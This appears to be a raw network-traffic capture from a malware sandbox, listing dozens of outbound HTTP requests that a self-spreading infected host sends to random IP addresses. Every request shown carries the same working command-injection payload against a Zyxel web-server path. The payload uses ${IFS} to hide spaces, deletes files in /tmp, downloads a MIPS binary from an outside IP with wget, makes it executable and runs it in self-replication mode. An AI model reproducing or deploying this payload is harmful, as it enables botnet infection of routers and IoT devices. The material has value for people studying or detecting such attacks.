                                    Jan 13, 2024 19:02:43.398515940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6692192.168.2.1354828135.12.218.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.398578882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6693192.168.2.135590084.147.175.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.398631096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6694192.168.2.13360569.5.45.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.398725033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6695192.168.2.133737648.233.147.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.398766994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6696192.168.2.1349898114.154.142.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.398802042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6697192.168.2.1335208189.10.36.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.398869038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6698192.168.2.1358580217.61.176.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.398947001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6699192.168.2.1356554160.49.117.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.398986101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6700192.168.2.1336522173.89.49.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.399048090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6701192.168.2.1337102153.44.233.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.399116993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6702192.168.2.1339146210.36.185.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.399178982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6703192.168.2.1337592104.2.240.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.399240971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6704192.168.2.1344790176.58.145.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.399333954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6705192.168.2.133501293.101.191.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.399405956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6706192.168.2.135205462.158.88.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.399416924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6707192.168.2.1343010132.115.3.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.399457932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6708192.168.2.1341328104.246.112.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.399539948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6709192.168.2.134523267.61.154.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.399611950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6710192.168.2.1335868213.131.204.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.399676085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6711192.168.2.1340562180.35.33.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.399734020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6712192.168.2.1345982202.200.120.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.399796963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6713192.168.2.1344888173.75.76.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.399846077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6714192.168.2.133523236.160.233.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.399939060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6715192.168.2.133292651.149.214.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.400006056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6716192.168.2.133805464.231.88.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.400046110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6717192.168.2.1341650176.36.55.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.400083065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6718192.168.2.1350168124.43.163.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.400150061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6719192.168.2.135771439.195.69.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.400197983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6720192.168.2.133801489.70.236.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.400275946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6721192.168.2.134734283.65.117.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.400346041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6722192.168.2.135648042.208.31.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.400396109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6723192.168.2.1343308213.200.4.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.400454998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6724192.168.2.1339172182.91.132.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.400502920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6725192.168.2.1350434197.166.161.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.400562048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6726192.168.2.136089296.152.203.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.400615931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6727192.168.2.1350338183.143.73.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.400672913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6728192.168.2.133870651.241.210.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.400701046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6729192.168.2.135955882.197.127.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.400764942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6730192.168.2.1347976171.23.72.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.400816917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6731192.168.2.135201817.172.212.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.400896072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6732192.168.2.1356906207.53.242.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.400947094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6733192.168.2.134169061.224.21.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.401027918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6734192.168.2.1336012217.230.146.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.401106119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6735192.168.2.133586043.124.149.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.401171923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6736192.168.2.1359994125.86.234.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.401237965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6737192.168.2.13482902.203.68.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.401272058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6738192.168.2.1333656219.182.37.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.401315928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6739192.168.2.133747291.62.106.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.401398897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6740192.168.2.1353630217.157.93.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.401442051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6741192.168.2.133498291.161.6.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.401509047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6742192.168.2.133711277.147.212.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.401573896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6743192.168.2.1360460161.168.97.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.401624918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6744192.168.2.1356380175.128.80.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.401719093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6745192.168.2.1351760110.145.172.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.401781082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6746192.168.2.1341572180.151.108.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.401828051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6747192.168.2.133970266.218.185.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.401859045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6748192.168.2.136001661.215.29.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.401952982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6749192.168.2.134463665.105.141.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.402029037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6750192.168.2.1336072152.25.104.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.402110100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6751192.168.2.135755677.199.4.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.402169943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6752192.168.2.1339024157.34.162.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.402236938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6753192.168.2.1340270170.32.131.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.402299881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6754192.168.2.1354570157.104.187.58443
                                    TimestampBytes transferredDirectionData
